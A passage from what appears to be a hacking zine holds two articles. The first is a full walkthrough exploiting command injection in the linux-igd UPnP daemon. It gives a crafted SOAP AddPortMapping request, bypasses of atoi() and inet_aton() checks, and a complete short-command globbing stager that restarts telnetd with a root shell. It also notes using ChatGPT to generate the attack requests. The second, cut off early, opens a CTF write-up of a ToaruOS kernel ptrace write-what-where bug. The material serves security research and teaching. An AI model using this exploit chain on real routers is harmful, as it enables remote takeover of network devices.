    -drive file=fedora21.qcow2,format=qcow2 \
    -boot d \
    -net nic\
    -net user \
    -vga std \
    -display default

Once the operating system is installed on the guest machine, the VM can be
powered off and then restarted using the command below.

$ qemu-system-x86_64 \
    -m 4G
    -smp 4 \
    -drive file=fedora21.qcow2,format=qcow2 \
    -net nic \
    -net user,hostfwd=tcp::2222-:22 \
    -vga std \
    -display default

The libupnp[4] library must be compiled before linux-igd because it depends
on it to implement the UPnP Internet Gateway Device (IGD) protocol. Since
linux-igd links against libupnp during compilation, failing to compile
libupnp first will result in build errors due to missing headers and
libraries. Therefore, compiling libupnp first ensures that the required
dependencies are available for successfully building linux-igd. According
to the linux-igd installation file INSTALL, we must first compile version
1.3.1[5] of the libupnp library.

$ tar -xf libupnp-1.3.1.tar.gz
$ cd libupnp-1.3.1/
$ ./configure
$ make -j4
$ sudo make install

The targeted service can then be compiled.

$ tar -xf linuxigd-1.0.tar.gz
$ cd linuxigd-1.0/
$ make -j4
$ sudo make install

Following the installation of linux-igd, the following files have been
added to the system.

/etc/
|__ linuxigd/
|   |__ dummy.xml
|   |__ gateconnSCPD.xml
|   |__ gatedesc.xml
|   |__ gateicfgSCPD.xml
|__ upnpd.conf

To have a functional service that simulates a real network device, our
virtual machine needs two interfaces:

- WAN interface (created as a dummy interface)
- LAN interface (the one we are connected to via SSH).

$ sudo ip link add name dummy0 type dummy
$ sudo ip link set dummy0 up
$ sudo ip addr add 192.168.13.37/24 dev dummy0

To verify that the interface has been correctly created and configured, use
the following command.

$ ip addr show dummy0

Once the tests are complete, it can be deleted using the following command.

$ sudo ip link delete dummy0

To set up debugging, use GDB to place a breakpoint on the system() function
call but first, set the debug_mode value in the file /etc/upnpd.conf as
follows (to improve debugging).

# Daemon debug level. Messages are logged via syslog to debug.
# 0 - no debug messages
# 1 - log errors
# 2 - log errors and basic info
# 3 - log errors and verbose info
# default = 0
debug_mode = 3

The service can then be started using the following command.

$ sudo LD_LIBRARY_PATH=/usr/local/lib upnpd -f  

To debug with GDB, simply retrieve the PID of the process associated with
the service.

$ ps auxf|grep upnpd
$ gdb -p 
$ (gdb) break system
$ (gdb) c

Now that the service is up and running and the debugging setup is complete,
the next step is to interact with it. To do this, we need to review the
contents of the gatedesc.xml and gateconnSCPD.xml files which are located 
in  /etc/linuxigd/. Although we were not always fans of AI, we have come to 
realize that, as the saying goes, "Only fools do not change their minds!' 
With that in mind, it might be worthwhile to use a Large Language Model 
(LLM) based on the GPT-4 architecture to parse the XML files and generate 
the necessary HTTP requests for interacting with the service. This approach 
is especially useful when working with a service that has been enhanced 
with new features (but still based on linux-igd within the SDK). For 
instance, ChatGPT was able to provide the HTTP requests to reach the 
vulnerable function pmlist_AddPortMapping().

POST /upnp/control/WANIPConn1 HTTP/1.1
Host: 127.0.0.1:49152
Content-Type: text/xml; charset="utf-8"
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
Content-Length: 704

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                xmlns:urn="urn:schemas-upnp-org:service:WANIPConnection:1">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:AddPortMapping>
         <NewRemoteHost></NewRemoteHost>
         <NewEnabled>1</NewEnabled>
         <NewLeaseDuration>1</NewLeaseDuration>
         <NewPortMappingDescription>POC</NewPortMappingDescription>
         <NewProtocol>AAA</NewProtocol>
         <NewExternalPort>BBBBB</NewExternalPort>
         <NewInternalClient>CCCCCCCCCCCCCCC</NewInternalClient>
         <NewInternalPort>DDDDD</NewInternalPort>
      </urn:AddPortMapping>
   </soapenv:Body>
</soapenv:Envelope>


Once the request is sent using curl, the following behavior can be
monitored.

$ curl -v \
    -d @body.soap \
    -H 'Content-Type: text/xml; charset="utf-8"' \
    -H 'SOAPAction: "...IPConnection:1#AddPortMapping"' \
    'http://127.0.0.1:49152/upnp/control/WANIPConn1'

$ sudo LD_LIBRARY_PATH=/usr/local/lib upnpd -f dummy0 ens3
upnpd[1878]: Initializing UPnP SDK ...
upnpd[1878]: UPnP SDK Successfully Initialized.
upnpd[1878]: Setting the Web Server Root Directory to /etc/linuxigd
upnpd[1878]: Succesfully set the Web Server Root Directory.
upnpd[1878]: Registering the root device with descDocUrl
http://10.0.2.15:49152/gatedesc.xml
upnpd[1878]: IGD root device successfully registered.
upnpd[1878]: Advertisements Sent.  Listening for requests ...
upnpd[1878]: ActionName = AddPortMapping
upnpd[1878]: appended 1 AAA BBBBB CCCCCCCCCCCCCCC DDDDD 1
upnpd[1878]: /sbin/iptables -t nat -I PREROUTING -i dummy0 -p AAA
--dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD
upnpd[1878]: /sbin/iptables -A FORWARD -p AAA -d CCCCCCCCCCCCCCC
--dport DDDDD -j ACCEPT
upnpd[1878]: ScheduleMappingExpiration: DevUDN: uuid:XXXXXXXX-XXXX-XXXX-XXX
X-XXXXXXXXXXXX ServiceID: urn:upnp-org:serviceId:WANIPConn1 Proto: AAA
ExtPort: BBBBB Int: CCCCCCCCCCCCCCC.DDDDD at: Mon Jan  1 00:00:00 1970
 eventId: 0
upnpd[1878]: PortMappingNumberOfEntries: 1
upnpd[1878]: AddPortMap: DevUDN: uuid:XXXXXXXX-XXXX-XXXX-8e6c-XXXXXXXXXXXX
ServiceID: urn:upnp-org:serviceId:WANIPConn1 RemoteHost: (null) Prot: AAA
ExtPort: BBBBB Int: CCCCCCCCCCCCCCC.DDDDD
upnpd[1878]: ExpireMapping: Proto:AAA Port:BBBBB
upnpd[1878]: /sbin/iptables -t nat -D PREROUTING -i dummy0 -p AAA
--dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD
upnpd[1878]: [HIT 3] /sbin/iptables -D FORWARD -p AAA -d CCCCCCCCCCCCCCC
--dport DDDDD -j ACCEPT
upnpd[1878]: ExpireMapping: UpnpNotifyExt(deviceHandle,uuid:XXXXXXXX-XXXX-X
XXX-XXXX-XXXXXXXXXXXX,urn:upnp-org:serviceId:WANIPConn1,propSet)
  PortMappingNumberOfEntries: 0

Please note that after the HTTP request was sent, four system commands were
executed. For clarity, we will summarize them as follows, with the portions
before the first injection point replaced by "U".

$ U AAA --dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD
$ U AAA -d CCCCCCCCCCCCCCC --dport DDDDD -j ACCEPT
$ U AAA --dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD
$ U AAA -d CCCCCCCCCCCCCCC --dport DDDDD -j ACCEPT

It is evident that commands one and three are identical, as are commands
two and four. To summarize, here are the commands that were executed once
the request was processed by the service.

$ U AAA --dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD
$ U AAA -d CCCCCCCCCCCCCCC --dport DDDDD -j ACCEPT

Now, the fun begins!

---------------------------------------------------------------------------
--[ 5. Becoming a Bash Jiu Jitsu white belt

Currently, it is possible to inject ourselves into two different commands
at several locations within these commands. However, we must, overcome
two problems.

1. We control exactly 28 characters ("AAA", "BBBBB", "CCCCCCCCCCCCCCC",
   "DDDDD") in the first command and 23 in the second.
2. Our injection points are discontinuous and there are elements (command
   options) between our different injection points.

The backtick or backquote (`) in shell scripting is used for command
substitution, where the shell executes the command inside the backticks
and replaces the backtick expression with the output of the command. It
is supported by many Unix-like shells, including sh (Bourne Shell), bash
(Bourne Again Shell), ash (Almquist Shell) and dash (Debian Almquist
Shell).

+-------+----------------+------------------------------------------------+
| Shell | "`" Supported? | Version(s) Supporting Backquotes               |
+-------+----------------+------------------------------------------------+
| sh    | Yes            | All versions (all modern POSIX-compliant)      |
| bash  | Yes            | All versions (from 1.0 in 1989 to present)     |
| ash   | Yes            | All versions (since 1989, including BusyBox)   |
| dash  | Yes            | All versions (since 2001)                      |
+-------+----------------+------------------------------------------------+

We will use this feature to remove the parts we don't need by using
backquotes, which will (since these interpreted commands produce no output
on stdout) concatenate our various injection points.

$ U ;A` --dport `BBB` -j DNAT --to `CCCCCCCCCCCCC`:`DDDD
...
sh: --dport: command not found
sh: -j: command not found
sh: ABBBCCCCCCCCCCCCCDDDD: command not found
$ U ;A` -d `CCCCCCCCCCCCC` --dport `DDDD -j ACCEPT
...
sh: -d: command not found
sh: --dport: command not found
sh: ACCCCCCCCCCCCCDDDD: command not found

We observe that the command ABBBCCCCCCCCCCCCCDDDD (length 21) is executed,
as well as the ACCCCCCCCCCCCCDDDD (length 18) command. You might say that
using 21 characters (or 18) to exploit a command injection is simple enough
to do with minimal effort. So let's make things a little more complex. 

---------------------------------------------------------------------------
--[ 6. Becoming a Bash Jiu Jitsu purple belt

Some of the variants of linuxigd (linux-igd) you may come across, might
implement security checks on specific values. For example, some of the most
up-to-date variants, check the values of XML nodes, NewExternalPort and
NewInternalPort with the function atoi(). You may encounter code snippets
like the one below.

ext_port = GetFirstDocumentItem(ca_event->ActionRequest, "NewExternalPort")
...
/* validate the ports */
a = atoi(ext_port);
if (a > 65535 || a < 1)
{
    return -1;
}


The concept of implementing value control is a good one, but unfortunately
for developers, it is done incorrectly by using the atoi() function.
Consider the file test_atoi.c as an example, containing the following C
code.

#include <stdio.h>
#include <stdlib.h>

int main() {
    char numberStr[] = "5`BB`";
    int a = atoi(numberStr);
    if (a > 65535 || a < 1)
    {
        return -1;
    }
    return 0;
}


Compile it using the command below, then after executing it, let's retrieve
the value of the return code.

$ gcc test_atoi.c -o test_atoi
$ ./test_atoi
$ echo $?
0

It is clear that the payload (value contained in the NewExternalPort node)
has bypassed the security check. What happens is that the atoi() function
converts a string into an integer, stopping at the first non-numeric
character. The function will first encounter the character 5, which is a
valid numeric character. After the 5, it encounters the backtick character.
Since backticks are not part of a valid integer, atoi() will stop parsing
the string at this point. By using a payload that bypasses this check, the
number of characters available for command injection will be reduced. Nodes
NewExternalPort and NewInternalPort must follow the structure of "5`BB`"
and "6`DDD" for example (but it depends on the target you want to exploit).

Although we currently have fewer characters at our disposal, let's try to
go one step further and make the security features more complex.

---------------------------------------------------------------------------
--[ 7. Becoming a Bash Jiu Jitsu black belt

Port checks having been bypassed, let's imagine that the target now checks
the IP value using the inet_aton() function as shown below.

int_ip = GetFirstDocumentItem(ca_event->ActionRequest, "NewInternalClient")
...
/* validate the IP address */
struct in_addr req_addr;
if (0 == inet_aton(int_ip, &req_addr))
{
    return -1;
}


Consider the file test_inet_aton.c as an example, containing the following
C code.

#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>

int main() {
    const char *ip_str_a = "192.168.1.1";
    const char *ip_str_b = "192.168.1.1 `C`";
    struct in_addr addr_a;
    struct in_addr addr_b;

    if (0 == inet_aton(ip_str_a, &addr_a)) {
        printf("Internal Error.\n");
        return -1;
    }
    if (0 == inet_aton(ip_str_b, &addr_b)) {
        printf("Internal Error.\n");
        return -1;
    }

    return 0;
}


Compile it using the command below, then after executing it, let's retrieve
the value of the return code.

$ gcc test_inet_aton.c -o test_inet_aton
$ ./test_inet_aton
$ echo $?
0

What happens is that, inet_aton() will succeed in converting the IP address
as long as the initial part of the string is a valid IP address format.
After parsing "192.168.1.1", inet_aton() will encounter " `C`". These
characters are not valid for an IP address and are simply ignored by
inet_aton(). Consequently, structs in_addr will contain the binary
representation of the IP address "192.168.1.1".

$ U ;A` --dport 5`BB` -j DNAT --to 192.168.1.1 `C`:6`DDD
...
sh: --dport: command not found
sh: -j: command not found
sh: :6: command not found
sh: ABBCDDD: command not found
$ U ;A` -d 192.168.1.1 `C` --dport `DDDD -j ACCEPT
...
sh: -d: command not found
sh: --dport: command not found
sh: ACDDDD: command not found

All security checks have been bypassed, leaving 7 (or 6) characters to
carry out the command injection in case the IP is 192.168.1.1 and 9 (or 8)
if IP have 10.10.0.1 as format. As it can be understood, the format of the
IP of the target will have a consequence on the number of characters
controllable for the injection. Depending on the vendor, different default
IPs can be defined for their network equipment, but the format of the two
IPs mentioned above are generally the most common.

---------------------------------------------------------------------------
--[ 8. Claiming supremacy over the mats

As it may be evident, the intriguing aspect arises when attempting to
answer the question: How can arbitrary commands be executed when only 7
characters are known to be controllable?

The answer is, to take advantage of globbing. Globbing is the process of
pattern matching for filenames and behaves similarly across shells like sh,
bash, ash, and dash, as they all follow POSIX standards. Common globbing
patterns such as *, ?, and [...] are supported in all these shells,
allowing users to match groups of files using wildcards. However, bash
stands out by offering advanced features like extended globbing and
recursive globbing with **, which are not available in ash, dash, or sh,
which are more minimalistic and focus on speed and efficiency.

The order in which files are matched during globbing in shells generally
follows lexicographical order, but it may vary depending on the system's
locale. Typically, in UTF-8 or ASCII environments, files starting with
digits come first, followed by uppercase letters and then lowercase
letters. For files whose filenames contain special characters, different
behavior have been observed where they may be listed either first or last.
While the basic globbing behavior is consistent across all shells,
differences may arise if the locale changes, affecting how special
characters, numbers, and letters are ordered. Here is a simple example.

Consider the previous virtual machine, if files are created using the
command below.

$ touch .A .B .a .b .1

The following command is used with as shell bash (or zsh).

$ echo .?
.1 .a .A .b .B

However, with ash (BusyBox version), the following result is obtained.

$ echo .?
.. .1 .A .B .a .b

After a little investigation the discrepancies may come from the locale
differences between interpreters. ash use the C locale (also known as the
POSIX locale) which is the default system locale that is typically used in
Unix-like operating systems when no specific locale is set. And the related
sorting does not take into account accents, case sensitivity, or linguistic
rules. Characters are sorted in the following order (ASCII values of
characters).

- Digits (0-9) first.
- Uppercase letters (A-Z) next.
- Lowercase letters (a-z) last.
- Special characters (like !, #, etc.) have a predefined order, which is
  based on their ASCII values.

It is time to put little dishes into the big ones and mix all the
ingredients together to make a good soup. To do this, the first thing we
need to do is define the only limitation that our technique confronts us
with.

As a stager is about to be created, the current directory of the
process being exploited (upnpd) must be writable. The CWD environment
variable typically refers to the current working directory of the shell or
process. It holds the path of the directory in which the process is running
or where it was launched from (however, it is important to note that CWD is
not a standard environment variable in all systems—it's more commonly used
in certain applications or scripts to track the current directory).

Alternatively, the /proc/self/cwd symbolic link in Linux can be used to
track the current working directory of a running process by pointing to the
directory in which the process is currently operating. Since /proc/self
refers to the current process, accessing /proc/self/cwd provides the
absolute path to that process’s working directory. It is to be noted that
this link is automatically updated when the process changes its working
directory, such as when it executes the cd command or changes directories
programmatically. By reading the target of /proc/self/cwd, the working
directory of a process can be programmatically determine at any given time
(making it a useful tool for monitoring).

Let's start with the simplest case (using ash), taking control of the
target when we can execute an 8-character command.

Create files named "killall" and "telnetd".

$ >killall
$ >telnetd

Kill telnetd and restarting it with the desired options (-lsh).

$ k* t*
$ t* -lsh

Yes, it is that simple. The same process may be used with 7 characters.

Clean current directory (/proc/self/cwd).

$ rm -r *

Writing string "killal\n" into ".a".

$ >killal
$ >echo
$ *>>l
$ cp l .a
$ rm -r *

Writing string " echo\n" into ".c".

$ >" "
$ >echo
$ e* *>>l
$ cp l .c
$ rm -r *

Writing string "telnet\n" into ".d".

$ >telnet
$ >echo
$ *>>l
$ cp l .d
$ rm -r *

Writing string "lsh\n" into ".g".

$ >lsh
$ >echo
$ *>>l
$ cp l .g
$ rm -r *

Writing string "killal" into ".a".

$ >head
$ cp .a f
$ cp f h*
$ rm f
$ >-c
$ >6
$ h* *>>h
$ cp h .a
$ rm h

Writing string "telnet" into ".d".

$ cp .d f
$ cp f h*
$ rm f
$ h* *>>h
$ cp h .d
$ rm h

Writing string "lsh" into ".g".

$ cp .g f
$ cp f h*
$ rm f
$ rm 6
$ >3
$ h* *>>h
$ cp h .g
$ rm h

Writing string " " into ".c".

$ cp .c f
$ cp f h*
$ rm f
$ rm 3
$ >1
$ h* *>>h
$ cp h .c
$ rm h

Writing string "l" into ".b".

$ >echo
$ e* l>>f
$ rm echo
$ cp f h*
$ rm f
$ h* *>>h
$ cp h .b
$ rm h

Writing string "d" into ".e".

$ >echo
$ e* d>>f
$ rm echo
$ cp f h*
$ rm f
$ h* *>>h
$ cp h .e
$ rm h

Writing string "-" into ".f".

$ >echo
$ e* ->>f
$ rm echo
$ cp f h*
$ rm f
$ h* *>>h
$ cp h .f
$ rm h

Executing command "killall telnetd".

$ >cat
$ cp .a A
$ cp .b B
$ cp .c C
$ cp .d D
$ cp .e E
$ c* ?|sh

Executing command "telnetd -lsh".

$ cp .d A
$ cp .e B
$ cp .c C
$ cp .f D
$ cp .g E
$ c* ?|sh

---------------------------------------------------------------------------
--[ 9. Conclusion

Of course, the chosen target was just an excuse (as many vulnerabilities
have already been identified and exploited in the past) for presenting
the very subject of the article, which is the optimization of command
injection in the context of using a limited number of characters. We have
demonstrated that even with just a few characters at our disposal, we are
capable of writing a stager (in a file) that can execute a real malicious
payload and thus compromise a device.

---------------------------------------------------------------------------
--[ 10. Acknowledgments (527e876c0d7e3049d1d99f00f3fbf9a9b0c63ccf)

I'd like to thank all the people we have come to know and will come to know
in our lives as hackers, as well as all those who have made the effort to
document their research work, and will do so in the future.

We can finally become immortals. Thank you for everything.

---------------------------------------------------------------------------
--[ 11. References



|=-----------------------------------------------------------------------=|
|=----------------------=[ 8 - Breaking ToaruOS ]=-----------------------=|
|=-----------------------------------------------------------------------=|
|=----------------=[ CTF as a kernel exploitation intro ]=---------------=|
|=-----------------------------------------------------------------------=|
|=-------------=[ NOT / Firzen ]=---------=[ Binary Gecko ]=-------------=|
|=-----------------------------------------------------------------------=|


---[ Index

0 - Introduction
1 - The Challenge
  1.1 - Environment
2 - ToaruOS
  2.1 - Mitigations
3 - Kernel Bugs
4 - Searching for a bug
  4.1 - How to open a file
  4.2 - Becoming root normally
  4.3 - SUID on the kernel side
  4.4 - ptrace
  4.5 - Poking the first hole
  4.6 - Flat mapping excursion
5 - The bug
6 - Write-what-where, but where?
  6.1 - No KASLR
  6.2 - SUIDn't
7 - In Closing
A - Exploit Code

—[ 0 - Introduction


In this article I would like to talk about the process of finding and
exploiting a kernel zero day.

I will use a CTF challenge about finding zero days in a hobby OS kernel
as scaffolding and walk through the layers of protection that the
kernel provides and one of the zero days used to break them.

I think it is a great way to dive into some of the lower level code and
bug classes that can only occur on a kernel level without having to
first understand the internals of a major modern OS kernel and its many
mitigations.

—[ 1 - The Challenge


During the 38C3 conference HXP hosted a CTF that included a kernel
exploitation challenge called "Ser Szwajcarski" (polish for swiss
cheese). Apart from the name the challenge was unusual in two other
respects:

Firstly, it wasn't for any major OS, but instead for a relatively niche
hobby kernel.

Secondly, it targeted the current version at the time of the OS.
So really, the challenge was to find a zero day for the OS.

—[ 1.1 - Environment


Before we get into the details, what was the setup of the challenge?

You were provided a low-priv remote shell running on ToaruOS and had
to access the flag in a file that only the root user could access.


They also provided a Dockerfile so that you could set up an identical
local test environment.

—[ 2 - ToaruOS


So, what kind of OS is ToaruOS?
It is a unix-like hobby OS written by Kevin Lange. It is one of the
more advanced hobby OS projects and still actively being developed.
But this isn't a history lesson, so I'll get straight to the parts that
are relevant to us.

—[ 2.1 - Mitigations


Modern operating systems employ a large number of mitigations to make
them more resilient, for safety and for security.

I'll give a brief overview of the major common ones on x86_64 Linux and
then go over how they apply to ToaruOS in 3.1.5.

Basically all of them have analogues for different architectures and
operating systems, but that's way too much to cover.

I am also leaving out several other mitigations that aren't relevant to
the vulnerability or are Linux-specific.

—[ 2.1.1 - CPU rings


On x86 the CPU can run with several distinct privilege levels called
rings. These restrict which actions the CPU is allowed to perform.
For example you can not change the CR3 register, which points to the
page directory, while in ring 3. For this article all you need to know 
is that ring 0 is 'kernel mode' and ring 3 is 'user mode'.

This is why system calls exist. A system call is just a CPU in ring 3
causing an interrupt that is handled by the kernel in ring 0.
That code in the kernel then interprets the request and checks if it is
sane and allowed. If so it then performs an action on behalf of that
ring 3 request.

—[ 2.1.2 - Page protections

A page is a physical region of memory that can be mapped to one or more
virtual addresses. These mappings have several flags that determine
how the mapped page can be accessed. For this article we only care
about the following 3 flags:


  P   -  Present
      Is this page mapped at all?

  R/W -  Read/Write
      Is this page read-only or writable?

  U/S -  User/Supervisor
      Is this page accessible from ring 3 or only ring 0?

I want to explicitly point out that these flags exist for each separate 
mapping of a page. The same physical page can be mapped at multiple 
virtual addresses with different permissions.

—[ 2.1.3 - KASLR - Kernel Address Space Layout Randomization


The kernel version of user space ASLR you may already be familiar with.
What this effectively means is that you don't know ahead of time where
in memory the kernel will be mapped.

—[ 2.1.4 - SMEP/SMAP - Supervisor Mode Execution/Access Prevention


These two mitigations prevent the kernel from accessing userspace
memory directly through a pointer. Any data access has to instead go 
through special functions that will temporarily disable the mitigation.
Any execution access of userspace memory in kernel mode is completely
disallowed. When the kernel returns to userspace it has to also switch
to user mode at the same time.

—[ 2.1.5 - ToaruOS mitigations overview

+ CPU rings
+ Page Protections
- KASLR
- SMEP/SMAP


On ToaruOS the first two mitigations exist and the latter two don't.
This is more or less expected since the first two are mainly enforced
by the hardware architecture rather than the OS.

The first three of those are the ones you should keep in mind for the
rest of this article.

—[ 3 - Kernel bugs


We are all very used to the security guarantees that our OS provides
and most of us probably take them for granted.

Of course, you can't open /etc/shadow as a normal user.
Of course, you can't just attach a debugger to a root process and alter
what it does.
Of course, you can't change the owner of an suid executable and keep
the suid flag.

But all of those things are enforced by the operating system.

It is common to become root or SYSTEM to demonstrate a kernel exploit,
but the truth is that you effectively have even higher privileges.

If the OS, specifically the kernel, isn't stopping you, you can do
anything.
(Yes, I am ignoring hypervisor based security for dramatic reasons)

All this to say: Kernel bugs may have the same root causes as many user
space bugs, but there are also entirely different bug classes that can
only really exist in a kernel.

So, I encourage you to challenge your preconceptions and question even
those "obvious" security concepts. ToaruOS has quite a few
similarities to Linux, so it is tempting to assume it provides all of
the same guarantees.

—[ 4 - Searching for a bug


Since the kernels' job is to enforce security guarantees it makes sense
to start by looking at how exactly it does that. Our goal is simply to
read a file, so let's look at how we may be able to open it.

—[ 4.1 - How to open a file


If you want to open a file in C you call the libc open() function.
This function internally then issues the corresponding system call.

The kernel side code of ToaruOS that handles the syscall is sys_open()
in '/kernel/sys/syscall.c'.

    long sys_open(const char * file, long flags, long mode) {
        PTR_VALIDATE(file);
        if (!file) return -EFAULT;
        fs_node_t * node = kopen((char *)file, flags);

        int access_bits = 0;

        if (node && (flags & O_CREAT) && (flags & O_EXCL)) {
            close_fs(node);
            return -EEXIST;
        }
        ...


The first thing the kernel does is to check that 'file' is a valid user
space pointer.
The 'ptr_validate()' function checks that the address is in user space
and is mapped with appropriate flags. This will be important later.

It then tries to open that file with 'kopen' and then performs access 
checks to determine if the file already exists. Afterwards, it continues 
to perform access checks.

This is how the OS enforces file system access permissions. If you want
to open a file it will check all of the permissions before the file is
ever visible in user mode.

        ...
        int fd = process_append_fd(this_core->current_process, node);
        ...
        return fd;
    }


If all the checks have passed 'process_append_fd()' is called and the
file descriptor is now visible in the user mode process.
'fd' is then returned from the system call and the libc then returns it
from 'open()'.

Since the checks here look sane, we need to change either the files
permissions or elevate our privileges. Let's take a look at elevating
privileges.

—[ 4.2 - Becoming root normally


You may have wondered how 'sudo' can make you 'root' on a Linux system.

It is definitely one of those "obvious" things I mentioned earlier, so
you may never have given it a second thought. But if you do, it seems a
little odd.

'sudo' is a program that runs in 'user mode' in ring 3 like any other.
It can't issue a magic CPU instruction that changes the user and it
can't write in kernel memory. If it could then so could any other user
mode process.
Clearly it uses the 'setuid()' libc function, but using it to switch to
another user requires privileges.

But we can run 'sudo' as a low-privileged user to become root, so what
makes 'sudo' special?

You probably already know that the way it works is that the file system
doesn't just store permissions for read/write/execute access, but can
also store flags and capabilities.

Particularly the SUID flag denotes that a program should be executed
not as the user that starts it, but as the user that owns the file.

On ToaruOS it works exactly the same way as it does on Linux:

    local@livecd ~$ ls -al /bin/sudo
    -r-sr-xr-x 1 root root 10384 Mar 16 17:26 /bin/sudo


Note that instead of 'x' it shows 's' for the execute permission,
showing the SUID bit is set.

—[ 4.3 - SUID on the kernel side


The implementation of the SUID bit is very straight-forward in ToaruOS
and can be found in 'elf_exec()' in '/kernel/misc/elf64.c'.

        if ((file->mask & S_ISUID) &&
            !(this_core->current_process->flags &
            (PROC_FLAG_TRACE_SYSCALLS | PROC_FLAG_TRACE_SIGNALS)))
        {
            /* setuid */
            this_core->current_process->user = file->uid;
        }


This is already the full implementation. If the 'S_ISUID' flag of the
file is set the user id of the process is set to the owner of the file.

The second half of the if clause exists so that if you start an SUID
binary with a debugger attached it doesn't change the user.

—[ 4.4 - ptrace


ToaruOS has the ability to debug programs in user space. It has a
'ptrace' syscall to do this, similar to the way it works on Linux.

'ptrace' lets you attach to a process - the 'tracee' - and to
manipulate it in various ways as the 'tracer'.
You can read registers, single-step, read or alter memory, etc.

'ptrace_handle()' in '/kernel/sys/ptrace.c' implements it in ToaruOS.
That function is just a huge switch statement based on which of these
operations was requested. Instead let's look at 'ptrace_peek()' and
'ptrace_poke()' for the moment.

'peek' reads a byte and 'poke' writes a byte in the tracee.
Keep in mind that when we are in the 'ptrace' syscall the current
process is the 'tracer', not the 'tracee'.

Let's start with 'ptrace_peek()':

    long ptrace_peek(pid_t pid, void * addr, void * data) {
        if (!data || ptr_validate(data, "ptrace")) return -EFAULT;
        process_t * tracee = process_from_pid(pid);
        if (!tracee
            || (tracee->tracer != this_core->current_process->id) 
            || !(tracee->flags & PROC_FLAG_SUSPENDED)
        )
                return -ESRCH;


Again it starts by verifying a user provided pointer 'data'.

But notably it does NOT verify 'addr'. We will get back to that.

Then it looks up the 'tracee' process. If the 'tracee' doesn't exist,
or if we aren't the 'tracer', or if the process isn't in a suspended
state we will error out.

        union PML * page_entry = mmu_get_page_other(
            tracee->thread.page_directory->directory, (uintptr_t)addr);

        if (!page_entry) return -EFAULT;
        if (!mmu_page_is_user_readable(page_entry)) return -EFAULT;


Next, it gets the page table entry of the provided address 'addr' in
the 'tracee' process.

The reason 'ptr_validate()' isn't used for 'addr' is that the address
is a pointer to memory in the currently running process, but instead in
the 'tracee'.

If there is no corresponding entry we exit with '-EFAULT'.
If there is an entry we check if it is user readable and if not we
error out as well. The check is implemented in a macro.

    #define mmu_page_is_user_readable(p) (p->bits.user)


It checks if the user bit on the page is set. What that means is that
we could just read the page from ring 3, so we can not access anything
new this way.
This all seems sensible, so let's move on.

—[ 4.5 - Poking the first hole


Taking a look at 'ptrace_poke()' it is very similar to 'ptrace_peek()'.

    long ptrace_poke(pid_t pid, void * addr, void * data) {
        if (!data || ptr_validate(data, "ptrace")) return -EFAULT;
        process_t * tracee = process_from_pid(pid);
        if (!tracee 
        || (tracee->tracer != this_core->current_process->id) 
        || !(tracee->flags & PROC_FLAG_SUSPENDED)) return -ESRCH;

        union PML * page_entry = mmu_get_page_other(
            tracee->thread.page_directory->directory, (uintptr_t)addr);

        if (!page_entry) return -EFAULT;
        if (!mmu_page_is_user_writable(page_entry)) return -EFAULT;


The only difference is that we check if the page is user writable now
instead of readable, which seems sensible.

But looking at the macro there's a glaring omission:

    #define mmu_page_is_user_writable(p) (p->bits.writable)


It does check if the writable bit is set, but it does NOT check for the
user bit.

—[ 4.6 - Flat mapping excursion


Feel free to skip this section, it just clarifies some details about
the way the write into another process works and is a little more
verbose than the rest of the article.

On x86 there is only one page table at a given time (per CPU).
Generally that page table is the one of the address space of the
currently running process.

But 'ptrace_poke' wants to write to a virtual address in the address
space of a different process. You might have noticed earlier that the
function that looks up the page table entry is called
'mmu_get_page_other()'.

The 'page_entry' that the function returns is a physical page that is
very likely not currently mapped anywhere in the address space of the
current process.

Looking at the rest of the ptrace_poke() function will help make things
clearer.

    uintptr_t mapped_address = 
    mmu_map_to_physical(tracee->thread.page_directory->directory,
    (uintptr_t)addr);

    if ((intptr_t)mapped_address < 0 && (intptr_t)mapped_address > -10) 
        return -EFAULT;


'mapped_address' is assigned the physical address that the virtual
address 'addr' is mapped to in the 'tracee'.

In order for a kernel to not have to constantly map and unmap pages it
is common to instead have a flat virtual mapping at some offset that
corresponds to every physical address minus that offset.

In ToaruOS that offset is:

    #define HIGH_MAP_REGION   0xffffff8000000000UL

    void * mmu_map_from_physical(uintptr_t frameaddress) {
        return (void*)(frameaddress | HIGH_MAP_REGION);
    }


This flat mapping is writable because the kernel is responsible for
performing access checks and because it can not know ahead of time if a
a given physical address may need to be written to in the future.

Finally here is the rest of 'ptrace_poke()'.

    uintptr_t blarg = (uintptr_t)mmu_map_from_physical(mapped_address);
    *(char*)blarg = *(char*)data;
    return 0;


'blarg' becomes the pointer into the flat mapping which is writable and
'data' is written to it.

As mentioned earlier, the access flags of a memory page are a property
of the virtual mapping and not of the page itself.
That is why 'mmu_page_is_user_writable()' needs to be explicitly
checked by the kernel instead of just attempting to write and seeing if
it fails.

—[ 5 - The bug


Why is that a problem and what can we do with it?

On first thought it may seem useless. The page probably doesn't have
the user bit set anyway, so we still can't write to it from user mode.

But during a syscall we aren't in user mode. The kernel handles
syscalls in ring 0 and it is allowed to access non-user pages.

'ptrace()' is exactly such a syscall, which means that if we provide a
valid kernel address and it is writable the write will succeed.

Luckily, the mapping of the kernel itself is read/write/execute.
I suspect because it is a LOT simpler to set it up that way before
remapping the kernel to a high address.

This means that for any address in the kernel itself we will pass the
'mmu_page_is_user_writable()' check.

So this bug gives us a very nice one byte write-what-where primitive.

—[ 6 - Write-what-where, but where?


Ideally we would like to just overwrite our own processes' uid to be 0
to become root.

Unfortunately for us, the check in 'ptrace_peek()' is correct. So,
while we can write in the kernel, we can't read anything anywhere in it.

—[ 6.1 - No KASLR


ToaruOS doesn't have KASLR, so we know exactly where in memory the
kernel is ahead of time. But what does that gain us?

We could try to overwrite a global pointer, for example the current
process and point it into our user space memory to a fake data
structure. 
This would probably work since ToaruOS doesn't have SMAP.

We could overwrite the address of an interrupt handler or a syscall or
some other function pointer and redirect it so that we can run our own
code in ring 0.
This, too, would probably work since ToaruOS doesn't have SMEP.

But both of these strategies require some extra effort in faking a data
structure or writing C code that works properly in ring 0.

